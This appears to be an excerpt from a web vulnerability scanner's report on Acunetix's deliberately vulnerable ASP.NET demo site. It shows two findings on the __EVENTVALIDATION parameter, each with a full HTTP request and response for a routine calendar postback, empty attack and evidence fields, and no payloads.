Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8221&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA300ZXtoIZGRkaCXqw1Z7IAZq8XLNbnSndSriRpk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLy7qecDwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM%2F4LikeZ9MJ02PC5ZpHxpKYZVKg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:28 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA300ZXtoIZGRkaCXqw1Z7IAZq8XLNbnSndSriRpk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLy7qecDwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M/4LikeZ9MJ02PC5ZpHxpKYZVKg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:White" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8358&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAdgDBydoIZGRkAOpPgDDfxcwHJZ%2B6R8HzVS6AbzY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLy8oy5AQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA2pi4O4BN3vBVgwfq6NqsRtXiMwm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:59 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAdgDBydoIZGRkAOpPgDDfxcwHJZ+6R8HzVS6AbzY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLy8oy5AQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA2pi4O4BN3vBVgwfq6NqsRtXiMwm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:White" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
